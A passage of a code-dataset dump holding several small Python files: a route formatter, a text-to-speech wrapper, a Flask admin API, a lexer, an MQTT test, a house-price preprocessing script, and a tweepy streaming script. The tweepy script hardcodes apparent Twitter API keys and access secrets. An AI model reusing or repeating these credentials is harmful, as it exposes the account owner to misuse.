Solution()\nprint(s.rectCover(number))","repo_name":"lovehhf/newcoder_py","sub_path":"剑指offer/递归和循环/矩形覆盖.py","file_name":"矩形覆盖.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26260100993","text":"\"\"\"format OSPF ROUTE output string.\"\"\"\n\n\ndef split_this(long_string):\n \"\"\"Return both strip and split methods of string.\"\"\"\n return long_string.strip().split()\n\n\nOSPF_ROUTE = \"O 10.0.24.0/24 [110/41] via 10.0.13.3, 3d18h, FastEthernet0/0\"\nTITLE_LIST = [\"Protocol:\",\n \"Prefix:\",\n \"AD/Metric:\",\n \"Next-Hop:\",\n \"Last update:\",\n \"Outbound Interface:\"]\n\nFINAL_LIST = split_this(OSPF_ROUTE.replace(',', ''))\nFINAL_LIST.remove('via')\nFINAL_LIST[2] = FINAL_LIST[2][1:-1]\n\nD = dict(zip(TITLE_LIST, FINAL_LIST))\n\nfor key in D:\n print('{:22} {:22}'.format(key, D[key]))\n","repo_name":"WizLuvFromMars/python-tools-poligon","sub_path":"3.1.py","file_name":"3.1.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37301752001","text":"from actuators.speak.speaker import Speaker\nfrom pydub import AudioSegment\nfrom pydub.playback import play\nfrom google.cloud import texttospeech\nimport logging\nimport os\n\n\nclass GoogleTextToSpeech(Speaker):\n\n output_filename = \"test.mp3\"\n\n def speak(self, message: str):\n # Create a Text-to-Speech client\n logging.debug(\"Creating text to speech client...\")\n client = texttospeech.TextToSpeechClient()\n\n logging.debug(\"Setting up Google Text to Speech configuration...\")\n # Set the text input\n input_text = texttospeech.SynthesisInput(text=message)\n\n # Configure the voice settings\n voice = texttospeech.VoiceSelectionParams(\n language_code=\"en-US\",\n ssml_gender=texttospeech.SsmlVoiceGender.FEMALE\n )\n\n # Set the audio configuration\n audio_config = texttospeech.AudioConfig(\n audio_encoding=texttospeech.AudioEncoding.MP3\n )\n\n # Perform the text-to-speech request\n logging.debug(\"Getting Google Text to Speech response...\")\n response = client.synthesize_speech(\n input=input_text, voice=voice, audio_config=audio_config\n )\n\n # Save the audio to a file\n logging.debug(f\"Writing temp response file to {self.output_filename}...\")\n with open(self.output_filename, 'wb') as out:\n out.write(response.audio_content)\n logging.debug(f\"Audio content written to '{self.output_filename}'\")\n\n # Speak\n logging.info(f\"Saying: {message}\")\n spoken_word = AudioSegment.from_mp3(self.output_filename)\n play(spoken_word)\n\n # Remove temp file\n try:\n logging.debug(f\"Trying to remove temp file: {self.output_filename}...\")\n os.remove(self.output_filename)\n except FileNotFoundError:\n pass\n except Exception as e:\n logging.error(f\"Could not remove temp file {self.output_filename} with error: {e}\")\n\n","repo_name":"danbrick92/general-ai","sub_path":"src/actuators/speak/google_tts/google_tts.py","file_name":"google_tts.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34567837746","text":"from flask_restx import Namespace, fields\nfrom flask import request\nfrom prod.api.base_resource import BaseResource\nfrom prod.db_models.admin_db_model import AdminDBModel\nfrom prod.exceptions import BusinessError, RepeatedEmailError\nfrom prod.schemas.user_representation import user_representation\nfrom prod.schemas.user_code20 import user_code20\nfrom prod.schemas.user_email_repeated import user_email_repeated\nfrom prod.schemas.constants import MISSING_VALUES_ERROR, REPEATED_USER_ERROR\n\n\nns = Namespace(\n name='admins',\n description='All users related operations'\n)\n\n\n@ns.route('')\nclass AdminsListResource(BaseResource):\n REGISTER_FIELDS = (\"name\", \"lastName\", \"email\", \"password\")\n\n code_status = {\n RepeatedEmailError: (409, REPEATED_USER_ERROR)\n }\n\n body_swg = ns.model(user_representation.name, user_representation)\n\n code_20x_swg = ns.model(user_code20.name, user_code20)\n\n code_400_swg = ns.model('One user output 400', {\n 'status': fields.String(example=MISSING_VALUES_ERROR),\n 'missing_args': fields.List(fields.String())\n })\n\n code_409_swg = ns.model(user_email_repeated.name, user_email_repeated)\n\n @ns.response(200, 'Success', fields.List(fields.Nested(code_20x_swg)))\n def get(self):\n \"\"\"Get all users data\"\"\"\n response_object =\\\n [user.serialize() for user in AdminDBModel.query.all()]\n return response_object, 200\n\n @ns.expect(body_swg)\n @ns.response(201, 'Success', code_20x_swg)\n @ns.response(400, MISSING_VALUES_ERROR, code_400_swg)\n @ns.response(409, 'User already exists', code_409_swg)\n def post(self):\n \"\"\"Create a new admin\"\"\"\n try:\n data = request.get_json()\n id = AdminDBModel.add_user(data['name'],\n data['lastName'],\n data['email'],\n data['password'])\n user_model = AdminDBModel.query.get(id)\n response_object = user_model.serialize()\n response_object['token'] = AdminDBModel.encode_auth_token(id)\n return response_object, 201\n except BusinessError as e:\n code, status = self.code_status[e.__class__]\n ns.abort(code, status=status)\n","repo_name":"Seedy-Fiuba-Grupo-5/Backend-users","sub_path":"backend_users/prod/api/admins_list_api.py","file_name":"admins_list_api.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72345455147","text":"__author__ = 'iravid'\n\nimport lex\n\nimport logging\nlogger = logging.getLogger(\"compile\")\n\nreserved_words = {\n \"code\": \"CODE\",\n \"const\": \"CONST\",\n \"define\": \"DEFINE\",\n \"do\": \"DO\",\n \"float\": \"FLOATDECL\",\n \"from\": \"FROM\",\n \"if\": \"IF\",\n \"int\": \"INTDECL\",\n \"ival\": \"IVAL\",\n \"otherwise\": \"OTHERWISE\",\n \"read\": \"READ\",\n \"rval\": \"RVAL\",\n \"then\": \"THEN\",\n \"to\": \"TO\",\n \"when\": \"WHEN\",\n \"while\": \"WHILE\",\n \"write\": \"WRITE\",\n \"and\": \"AND\",\n \"or\": \"OR\"\n}\n\nreserved_symbols = [\n \"LPAREN\", \"RPAREN\",\n \"LCURLPAREN\", \"RCURLPAREN\",\n \"COMMA\",\n \"COLON\",\n \"SEMICOLON\",\n \"EXCLAMATION\",\n \"PLUS\", \"MINUS\",\n \"MULT\", \"DIV\",\n \"EQ\", \"NEQ\", \"LT\", \"LTE\", \"GT\", \"GTE\",\n \"ASSIGN\", \"CONSTASSIGN\"\n]\n\ncomposed_tokens = [\n \"ID\",\n \"INTEGER\",\n \"FLOAT\"\n]\n\ntokens = reserved_symbols + reserved_words.values() + composed_tokens\n\nt_LPAREN = r\"\\(\"\nt_RPAREN = r\"\\)\"\nt_LCURLPAREN = r\"\\{\"\nt_RCURLPAREN = r\"\\}\"\n\nt_COMMA = r\",\"\nt_COLON = r\":\"\nt_SEMICOLON = r\";\"\nt_EXCLAMATION = r\"!\"\n\nt_PLUS = r\"\\+\"\nt_MINUS = r\"-\"\nt_MULT = r\"\\*\"\nt_DIV = r\"/\"\n\nt_EQ = r\"==\"\nt_NEQ = r\"!=\"\n\nt_LT = r\"<\"\nt_LTE = r\"<=\"\nt_GT = r\">\"\nt_GTE = r\">=\"\n\nt_ASSIGN = r\":=\"\nt_CONSTASSIGN = r\"=\"\n\ndef t_ID(t):\n r\"[a-zA-Z]([a-zA-Z]|[0-9])*\"\n\n # Check if we found a reserved word\n t.type = reserved_words.get(t.value, \"ID\")\n\n return t\n\ndef t_FLOAT(t):\n r\"[0-9]+\\.[0-9]*\"\n t.value = float(t.value)\n\n return t\n\ndef t_INTEGER(t):\n r\"[0-9]+\"\n t.value = int(t.value)\n\n return t\n\n# Ignore whitespace\nt_ignore = \" \\t\"\n\n# Multiline-handling comment rule\ndef t_COMMENT(t):\n r'//[^\\n]*\\n|/[*](.|\\n)*?[*]/'\n t.lexer.lineno += t.value.count('\\n')\n\ndef t_NEWLINE(t):\n r\"\\n+\"\n t.lexer.lineno += t.value.count(\"\\n\")\n\ndef t_error(t):\n logging.warning(\"Line %d: Skipping unexpected character '%s'\", t.lexer.lineno, t.value[0])\n t.lexer.skip(1)\n\nlexer = lex.lex()","repo_name":"iravid/compiler","sub_path":"src/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13479418662","text":"import tweepy\nimport json\nfrom tweepy import Stream\nfrom tweepy import OAuthHandler\nfrom tweepy.streaming import StreamListener\nimport argparse\n\nconsumer_key = 'Fi8UY5UtgvSm5pw5Gzyz29ZLE'\nconsumer_secret = '9H8mFPrWlbFfwqXyoSIHierQY6VfVckw3c1c5BKACGyhBqVO2g'\naccess_token = '1216047470033149952-KmHP7X2LhqDwWleYUZNMFcjLdpxwjg'\naccess_secret = 'atAA8KaQFjRk4sPEOtCiIyWpouoiLANd2BLQNvA090o9D'\n\nauth = OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_secret)\n\napi = tweepy.API(auth)\n\n\nclass MyListener(StreamListener):\n\n def on_data(self, data):\n try:\n # temp = str(data)\n js = json.loads(data)\n print(js[\"text\"])\n tempData = {\n \"fulltext\": js[\"text\"],\n \"time\": js[\"created_at\"],\n \"image\": js[\"user\"][\"profile_image_url\"]\n }\n tempObj.append(tempData)\n # with open('test.json', 'a') as f:\n with open('test.json', 'w+') as f:\n #f.write(json.dumps(tempdata))\n # f.write(',')\n f.write(json.dumps(tempObj))\n return True\n\n except BaseException as e:\n print(\"Error on_data: %s\" % str(e))\n return True\n\n def on_error(self, status):\n print(status)\n return True\n\ndef parse_args():\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-kw\", \"--keywords\", type=str, default=\"RBC\", help=\"Key words string. Saparated by #.\")\n args = ap.parse_args()\n return args\n\n# fo = open('test.json', 'w+')\nargs = parse_args()\nkeywords = args.keywords\nkeywords = keywords.replace('#',' ')\nprint('Search keywords: {}'.format(keywords))\n\ntempObj = []\nopen('test.json', 'w+')\ntwitter_stream = Stream(auth, MyListener())\n# twitter_stream.filter(track=['#123456789cuhacking'])\ntwitter_stream.filter(track=[keywords], languages=['en'])\n","repo_name":"monoKeith/cuAnalyse","sub_path":"web/RBC_tracking/streaming.py","file_name":"streaming.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24299852198","text":"import json\nimport os\nimport random\nimport string\nimport time\nimport typing\nimport pytest\nimport tenta\n\nPROJECT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nMQTT_HOST = \"test.mosquitto.org\"\nMQTT_PORT = 1884\nMQTT_IDENTIFIER = \"rw\"\nMQTT_PASSWORD = \"readwrite\"\nSENSOR_IDENTIFIER = \"\".join(\n random.choice(string.ascii_letters + string.digits) for i in range(32)\n)\n\n\ndef publish_config_object(topic: str, config_object: typing.Any) -> None:\n config_object_string = (\n config_object\n if isinstance(config_object, str)\n else json.dumps(config_object).replace('\"', r\"\\\"\")\n )\n command = (\n f\"mosquitto_pub -h {MQTT_HOST} -p {MQTT_PORT} \"\n + f\" -t {topic} \"\n + f\"-u {MQTT_IDENTIFIER} -P {MQTT_PASSWORD} \"\n + f'-m \"{config_object_string}\"'\n )\n print(f\"Executing command: {repr(command)}\")\n assert os.system(command) == 0\n\n\n@pytest.mark.order(3)\ndef test_config_receiving() -> None:\n tenta_client = tenta.TentaClient(\n mqtt_host=MQTT_HOST,\n mqtt_port=MQTT_PORT,\n mqtt_identifier=MQTT_IDENTIFIER,\n mqtt_password=MQTT_PASSWORD,\n connection_timeout=1,\n sensor_identifier=SENSOR_IDENTIFIER,\n receive_configs=True,\n )\n\n config_1 = tenta.ConfigurationMessage(\n revision=17,\n configuration={\"some_value\": 42},\n )\n config_2 = tenta.ConfigurationMessage(\n revision=18,\n configuration={\"some_other_value\": 43},\n )\n\n # send invalid config -> ignored by client\n publish_config_object(\n topic=f\"configurations/{SENSOR_IDENTIFIER}\",\n config_object={\"nota\": \"config\"},\n )\n time.sleep(1)\n received_config = tenta_client.get_latest_received_config_message()\n assert received_config is None\n\n # send another invalid config -> ignored by client\n publish_config_object(\n topic=f\"configurations/{SENSOR_IDENTIFIER}\",\n config_object=\"only a string\",\n )\n time.sleep(1)\n received_config = tenta_client.get_latest_received_config_message()\n assert received_config is None\n\n # send valid config but invalid topic -> ignored by client\n publish_config_object(\n topic=f\"some-other-topic/{SENSOR_IDENTIFIER}\",\n config_object=config_1.__dict__,\n )\n time.sleep(1)\n received_config = tenta_client.get_latest_received_config_message()\n assert received_config is None\n\n # send valid config -> accepted by client\n publish_config_object(\n topic=f\"configurations/{SENSOR_IDENTIFIER}\",\n config_object=config_1.__dict__,\n )\n time.sleep(1)\n received_config = tenta_client.get_latest_received_config_message()\n assert received_config is not None\n assert received_config.revision == config_1.revision\n\n # send invalid config -> ignored by client\n publish_config_object(\n topic=f\"configurations/{SENSOR_IDENTIFIER}\",\n config_object={\"nota\": \"config\"},\n )\n time.sleep(1)\n received_config = tenta_client.get_latest_received_config_message()\n assert received_config is not None\n assert received_config.revision == config_1.revision\n\n # send valid config -> accepted by client\n publish_config_object(\n topic=f\"configurations/{SENSOR_IDENTIFIER}\",\n config_object=config_2.__dict__,\n )\n time.sleep(1)\n received_config = tenta_client.get_latest_received_config_message()\n assert received_config is not None\n assert received_config.revision == config_2.revision\n\n tenta_client.teardown()\n","repo_name":"tum-esm/tenta-client","sub_path":"tests/test_config_receiving.py","file_name":"test_config_receiving.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"9463722096","text":"import warnings\n\nimport numpy as np\nimport pandas as pd\nimport joblib\nimport argparse\n\nimport matplotlib.pyplot as plt\nfrom catboost import CatBoostRegressor\nfrom lightgbm import LGBMRegressor\nfrom sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor\nfrom sklearn.exceptions import ConvergenceWarning\nfrom sklearn.linear_model import LinearRegression, Ridge, Lasso, ElasticNet\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split, GridSearchCV, cross_val_score\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.tree import DecisionTreeRegressor\nfrom xgboost import XGBRegressor\nfrom sklearn.model_selection import RandomizedSearchCV\nimport numpy as np\nfrom scipy.stats import norm\n\nfrom scipy import stats\nfrom scipy.stats import skew\nfrom scipy.stats import skew, boxcox_normmax, norm\nfrom scipy.special import boxcox1p\n\nimport time\nfrom contextlib import contextmanager\n\nfrom helpers.data_prep import *\nfrom helpers.eda import *\n\nwarnings.simplefilter(action='ignore')\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\n\nfrom warnings import filterwarnings\nfilterwarnings('ignore')\n\n\n# decaratorlör: fonksiyon biçimlendiren fonksiyonlardır.\n@contextmanager\n# zaman bilgisini yansıtmak için\ndef timer(title):\n t0 = time.time()\n yield\n print(\"{} - done in {:.0f}s\".format(title, time.time() - t0))\n print(\" \")\n\n\ndef get_namespace():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--nobase', dest='base', action='store_false')\n parser.set_defaults(base=True)\n\n parser.add_argument('--dump', dest='dump', action='store_true')\n parser.set_defaults(dump=False)\n\n parser.add_argument('--scoring', dest=\"scoring\", action=\"store\", type=str)\n parser.set_defaults(scoring=\"neg_mean_squared_error\")\n\n return parser.parse_args()\n\n\n######################################################\n# Data Preprocessing & Feature Engineering\n######################################################\ndef grab_col_names(dataframe, cat_th=10, car_th=20):\n \"\"\"\n\n Veri setindeki kategorik, numerik ve kategorik fakat kardinal değişkenlerin isimlerini verir.\n Not: Kategorik değişkenlerin içerisine numerik görünümlü kategorik değişkenler de dahildir.\n\n Parameters\n ------\n dataframe: dataframe\n Değişken isimleri alınmak istenilen dataframe\n cat_th: int, optional\n numerik fakat kategorik olan değişkenler için sınıf eşik değeri\n car_th: int, optinal\n kategorik fakat kardinal değişkenler için sınıf eşik değeri\n\n Returns\n ------\n cat_cols: list\n Kategorik değişken listesi\n num_cols: list\n Numerik değişken listesi\n cat_but_car: list\n Kategorik görünümlü kardinal değişken listesi\n\n Examples\n ------\n import seaborn as sns\n df = sns.load_dataset(\"iris\")\n print(grab_col_names(df))\n\n\n Notes\n ------\n cat_cols + num_cols + cat_but_car = toplam değişken sayısı\n num_but_cat cat_cols'un içerisinde.\n Return olan 3 liste toplamı toplam değişken sayısına eşittir: cat_cols + num_cols + cat_but_car = değişken sayısı\n\n \"\"\"\n\n # cat_cols, cat_but_car\n cat_cols = [col for col in dataframe.columns if dataframe[col].dtypes == \"O\"]\n num_but_cat = [col for col in dataframe.columns if dataframe[col].nunique() < cat_th and\n dataframe[col].dtypes != \"O\"]\n cat_but_car = [col for col in dataframe.columns if dataframe[col].nunique() > car_th and\n dataframe[col].dtypes == \"O\"]\n cat_cols = cat_cols + num_but_cat\n cat_cols = [col for col in cat_cols if col not in cat_but_car]\n\n # num_cols\n num_cols = [col for col in dataframe.columns if dataframe[col].dtypes != \"O\"]\n num_cols = [col for col in num_cols if col not in num_but_cat]\n\n # print(f\"Observations: {dataframe.shape[0]}\")\n # print(f\"Variables: {dataframe.shape[1]}\")\n # print(f'cat_cols: {len(cat_cols)}')\n # print(f'num_cols: {len(num_cols)}')\n # print(f'cat_but_car: {len(cat_but_car)}')\n # print(f'num_but_cat: {len(num_but_cat)}')\n return cat_cols, num_cols, cat_but_car\n\n\ndef one_hot_encoder(dataframe, categorical_cols, drop_first=False):\n dataframe = pd.get_dummies(dataframe, columns=categorical_cols, drop_first=drop_first)\n return dataframe\n\n\ndef check_df(dataframe, head=5):\n print(\"##################### Shape #####################\")\n print(dataframe.shape)\n print(\"##################### Types #####################\")\n print(dataframe.dtypes)\n print(\"##################### Head #####################\")\n print(dataframe.head(head))\n print(\"##################### Tail #####################\")\n print(dataframe.tail(head))\n print(\"##################### NA #####################\")\n print(dataframe.isnull().sum())\n print(\"##################### Quantiles #####################\")\n print(dataframe.quantile([0, 0.05, 0.50, 0.95, 0.99, 1]).T)\n\n\ndef find_correlation(dataframe, numeric_cols, corr_limit=0.50):\n high_correlations = []\n low_correlations = []\n for col in numeric_cols:\n if col == \"SalePrice\":\n pass\n else:\n correlation = dataframe[[col, \"SalePrice\"]].corr().loc[col, \"SalePrice\"]\n print(col, correlation)\n if abs(correlation) > corr_limit:\n high_correlations.append(col + \": \" + str(correlation))\n else:\n low_correlations.append(col + \": \" + str(correlation))\n return low_correlations, high_correlations\n\n\ndef high_correlated_cols(dataframe, plot=False, corr_th=0.90):\n corr = dataframe.corr()\n cor_matrix = corr.abs()\n upper_triangle_matrix = cor_matrix.where(np.triu(np.ones(cor_matrix.shape), k=1).astype(np.bool))\n drop_list = [col for col in upper_triangle_matrix.columns if any(upper_triangle_matrix[col] > corr_th)]\n if plot:\n import seaborn as sns\n import matplotlib.pyplot as plt\n sns.set(rc={'figure.figsize': (15, 15)})\n sns.heatmap(corr, cmap=\"RdBu\")\n plt.show()\n return drop_list\n\n\ndef outliers(dataframe, num_cols):\n outlier_indices = []\n for feature in num_cols:\n print('DEĞİŞKEN: {}'.format(feature))\n q1 = np.percentile(dataframe[feature], 5)\n q3 = np.percentile(dataframe[feature], 95)\n iqr = q3 - q1\n outlier_step = iqr * 1.5\n upper = q3 + outlier_step\n lower = q1 - outlier_step\n outlier_list_col = dataframe[(dataframe[feature] < lower) | (dataframe[feature] > upper)].index\n print('AYKIRI DEĞER SAYISI: {}'.format(outlier_list_col.shape[0]), '\\n')\n for a in outlier_list_col:\n outlier_indices.append(a)\n\n\ndef house_price_prep(dataframe):\n print(\"Data Preprocessing...\")\n check_df(dataframe)\n\n cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n outliers(dataframe, num_cols)\n # Veri kümesinin yazarı, '4000 fit kareden fazla olan evlerin' veri kümesinden çıkarılmasını önerir.\n dataframe = dataframe.drop(dataframe[(dataframe['GrLivArea'] > 4000) & (dataframe['SalePrice'] < 300000)].index)\n\n # MISSING VALUES\n missing_vs_target(dataframe, \"SalePrice\", missing_values_table(dataframe, na_name=True))\n missing_values_table(dataframe)\n\n dataframe[\"Alley\"] = dataframe[\"Alley\"].fillna(\"None\")\n dataframe[\"PoolQC\"] = dataframe[\"PoolQC\"].fillna(\"None\")\n dataframe[\"MiscFeature\"] = dataframe[\"MiscFeature\"].fillna(\"None\")\n dataframe[\"Fence\"] = dataframe[\"Fence\"].fillna(\"None\")\n dataframe[\"FireplaceQu\"] = dataframe[\"FireplaceQu\"].fillna(\"None\")\n dataframe[\"LotFrontage\"] = dataframe.groupby(\"Neighborhood\")[\"LotFrontage\"].transform(lambda x: x.fillna(x.median()))\n\n for col in ('GarageType', 'GarageFinish', 'GarageQual', 'GarageCond'):\n dataframe[col] = dataframe[col].fillna('None')\n\n dataframe.drop(['GarageArea'], axis=1, inplace=True)\n dataframe.drop(['GarageYrBlt'], axis=1, inplace=True)\n dataframe.drop(['Utilities'], axis=1, inplace=True)\n\n dataframe[\"GarageCars\"] = dataframe[\"GarageCars\"].fillna(0)\n\n for col in ('BsmtFinSF1', 'BsmtFinSF2', 'BsmtUnfSF', 'TotalBsmtSF', 'BsmtFullBath', 'BsmtHalfBath'):\n dataframe[col] = dataframe[col].fillna(0)\n\n for col in ('BsmtQual', 'BsmtCond', 'BsmtExposure', 'BsmtFinType1', 'BsmtFinType2'):\n dataframe[col] = dataframe[col].fillna('None')\n\n dataframe['MSZoning'] = dataframe.groupby('MSSubClass')['MSZoning'].apply(lambda x: x.fillna(x.mode()[0]))\n dataframe[\"MasVnrType\"] = dataframe[\"MasVnrType\"].fillna(\"None\")\n dataframe[\"MasVnrArea\"] = dataframe[\"MasVnrArea\"].fillna(0)\n\n dataframe[\"Functional\"] = dataframe[\"Functional\"].fillna(\"Typ\")\n dataframe['Electrical'] = dataframe['Electrical'].fillna(dataframe['Electrical'].mode()[0])\n dataframe['KitchenQual'] = dataframe['KitchenQual'].fillna(dataframe['KitchenQual'].mode()[0])\n dataframe['Exterior1st'] = dataframe['Exterior1st'].fillna(dataframe['Exterior1st'].mode()[0])\n dataframe['Exterior2nd'] = dataframe['Exterior2nd'].fillna(dataframe['Exterior2nd'].mode()[0])\n dataframe['SaleType'] = dataframe['SaleType'].fillna(dataframe['SaleType'].mode()[0])\n\n dataframe['YrSold'] = dataframe['YrSold'].astype(str)\n dataframe.loc[2590, 'GarageYrBlt'] = 2007\n\n # FEATURE ENGINEERING\n # Kategorik Değişkenler İçin\n # Öncelikle bazı kategorik değişkenleri sınıflarının bağımlı değişkene olan etkisine bakarak gruplayacağız.\n\n dataframe.groupby(\"Neighborhood\").agg({\"SalePrice\": \"mean\"}).sort_values(by=\"SalePrice\", ascending=False) # Fiyata en büyük etkisi olan mahalle NoRidge iken, en küçük etkisi olan mahalle MeadowV'dir. Bu ortalama değerlere göre bir sıralı gruplama yapacağız.\n\n nhood_map = {'MeadowV': 1, 'IDOTRR': 1, 'BrDale': 1,\n 'BrkSide': 2, 'Edwards': 2, 'OldTown': 2,\n 'Sawyer': 3, 'Blueste': 3,\n 'SWISU': 4, 'NPkVill': 4, 'NAmes': 4, 'Mitchel': 4,\n 'SawyerW': 5, 'NWAmes': 5,\n 'Gilbert': 6, 'Blmngtn': 6, 'CollgCr': 6,\n 'Crawfor': 7, 'ClearCr': 7,\n 'Somerst': 8, 'Veenker': 8, 'Timber': 8,\n 'StoneBr': 9, 'NridgHt': 9,\n 'NoRidge': 10}\n\n dataframe['Neighborhood'] = dataframe['Neighborhood'].map(nhood_map).astype('int')\n\n dataframe = dataframe.replace({\"MSSubClass\": {20: \"SC20\", 30: \"SC30\", 40: \"SC40\", 45: \"SC45\", \\\n 50: \"SC50\", 60: \"SC60\", 70: \"SC70\", 75: \"SC75\", \\\n 80: \"SC80\", 85: \"SC85\", 90: \"SC90\", 120: \"SC120\", \\\n 150: \"SC150\", 160: \"SC160\", 180: \"SC180\", 190: \"SC190\"},\n \"MoSold\": {1: \"Jan\", 2: \"Feb\", 3: \"Mar\", 4: \"Apr\", 5: \"May\", 6: \"Jun\", \\\n 7: \"Jul\", 8: \"Aug\", 9: \"Sep\", 10: \"Oct\", 11: \"Nov\", 12: \"Dec\"}\n })\n\n func = {\"Sal\": 0, \"Sev\": 1, \"Maj2\": 2, \"Maj1\": 3, \"Mod\": 4, \"Min2\": 5, \"Min1\": 6, \"Typ\": 7}\n dataframe[\"Functional\"] = dataframe[\"Functional\"].map(func).astype(\"int\")\n dataframe.groupby(\"Functional\").agg({\"SalePrice\": \"mean\"})\n # Belli bir dereceyi ifade eden sınıfları olan değişkenleri ordinal yapıya getirme.\n # MSZoning\n dataframe.loc[(dataframe[\"MSZoning\"] == \"C (all)\"), \"MSZoning\"] = 1\n dataframe.loc[(dataframe[\"MSZoning\"] == \"RM\"), \"MSZoning\"] = 2\n dataframe.loc[(dataframe[\"MSZoning\"] == \"RH\"), \"MSZoning\"] = 2\n dataframe.loc[(dataframe[\"MSZoning\"] == \"RL\"), \"MSZoning\"] = 3\n dataframe.loc[(dataframe[\"MSZoning\"] == \"FV\"), \"MSZoning\"] = 3\n # LotShape\n dataframe.groupby(\"LotShape\").agg({\"SalePrice\": \"mean\"}).sort_values(by=\"SalePrice\", ascending=False)\n shape_map = {\"Reg\": 1, \"IR1\": 2, \"IR3\": 3, \"IR2\": 4}\n dataframe['LotShape'] = dataframe['LotShape'].map(shape_map).astype('int')\n # LandContour\n dataframe.groupby(\"LandContour\").agg({\"SalePrice\": \"mean\"}).sort_values(by=\"SalePrice\", ascending=False)\n contour_map = {\"Bnk\": 1, \"Lvl\": 2, \"Low\": 3, \"HLS\": 4}\n dataframe['LandContour'] = dataframe['LandContour'].map(contour_map).astype('int')\n\n cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n rare_analyser(dataframe, \"SalePrice\", cat_cols)\n\n # LotConfig\n dataframe.loc[(dataframe[\"LotConfig\"] == \"Inside\"), \"LotConfig\"] = 1\n dataframe.loc[(dataframe[\"LotConfig\"] == \"FR2\"), \"LotConfig\"] = 1\n dataframe.loc[(dataframe[\"LotConfig\"] == \"Corner\"), \"LotConfig\"] = 1\n dataframe.loc[(dataframe[\"LotConfig\"] == \"FR3\"), \"LotConfig\"] = 2\n dataframe.loc[(dataframe[\"LotConfig\"] == \"CulDSac\"), \"LotConfig\"] = 2\n\n # Condition1\n cond1_map = {\"Artery\": 1, \"RRAe\": 1, \"Feedr\": 1,\n \"Norm\": 2, \"RRAn\": 2, \"RRNe\": 2,\n \"PosN\": 3, \"RRNn\": 3, \"PosA\": 3}\n dataframe['Condition1'] = dataframe['Condition1'].map(cond1_map).astype('int')\n #dataframe['Condition1'].isnull().sum()\n\n # BldgType\n dataframe.loc[(dataframe[\"BldgType\"] == \"2fmCon\"), \"BldgType\"] = 1\n dataframe.loc[(dataframe[\"BldgType\"] == \"Duplex\"), \"BldgType\"] = 1\n dataframe.loc[(dataframe[\"BldgType\"] == \"Twnhs\"), \"BldgType\"] = 1\n dataframe.loc[(dataframe[\"BldgType\"] == \"1Fam\"), \"BldgType\"] = 2\n dataframe.loc[(dataframe[\"BldgType\"] == \"TwnhsE\"), \"BldgType\"] = 2\n\n # RoofStyle\n dataframe.groupby(\"RoofStyle\").agg({\"SalePrice\": \"mean\"}).sort_values(by=\"SalePrice\", ascending=False)\n dataframe.loc[(dataframe[\"RoofStyle\"] == \"Gambrel\"), \"RoofStyle\"] = 1\n dataframe.loc[(dataframe[\"RoofStyle\"] == \"Gablee\"), \"RoofStyle\"] = 2\n dataframe.loc[(dataframe[\"RoofStyle\"] == \"Mansard\"), \"RoofStyle\"] = 3\n dataframe.loc[(dataframe[\"RoofStyle\"] == \"Flat\"), \"RoofStyle\"] = 4\n dataframe.loc[(dataframe[\"RoofStyle\"] == \"Hip\"), \"RoofStyle\"] = 5\n dataframe.loc[(dataframe[\"RoofStyle\"] == \"Shed\"), \"RoofStyle\"] = 6\n\n # RoofMatl\n dataframe.groupby(\"RoofMatl\").agg({\"SalePrice\": \"mean\"}).sort_values(by=\"SalePrice\", ascending=False)\n dataframe.loc[(dataframe[\"RoofMatl\"] == \"Roll\"), \"RoofMatl\"] = 1\n dataframe.loc[(dataframe[\"RoofMatl\"] == \"ClyTile\"), \"RoofMatl\"] = 2\n dataframe.loc[(dataframe[\"RoofMatl\"] == \"CompShg\"), \"RoofMatl\"] = 3\n dataframe.loc[(dataframe[\"RoofMatl\"] == \"Metal\"), \"RoofMatl\"] = 3\n dataframe.loc[(dataframe[\"RoofMatl\"] == \"Tar&Grv\"), \"RoofMatl\"] = 3\n dataframe.loc[(dataframe[\"RoofMatl\"] == \"WdShake\"), \"RoofMatl\"] = 4\n dataframe.loc[(dataframe[\"RoofMatl\"] == \"Membran\"), \"RoofMatl\"] = 4\n dataframe.loc[(dataframe[\"RoofMatl\"] == \"WdShngl\"), \"RoofMatl\"] = 5\n\n cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n rare_analyser(dataframe, \"SalePrice\", cat_cols)\n\n # ExterQual\n dataframe.groupby(\"ExterQual\").agg({\"SalePrice\": \"mean\"}).sort_values(by=\"SalePrice\", ascending=False)\n ext_map = {'Po': 1, 'Fa': 2, 'TA': 3, 'Gd': 4, 'Ex': 5}\n dataframe['ExterQual'] = dataframe['ExterQual'].map(ext_map).astype('int')\n\n # ExterCond\n ext_map = {'Po': 1, 'Fa': 2, 'TA': 3, 'Gd': 4, 'Ex': 5}\n dataframe['ExterCond'] = dataframe['ExterCond'].map(ext_map).astype('int')\n\n # 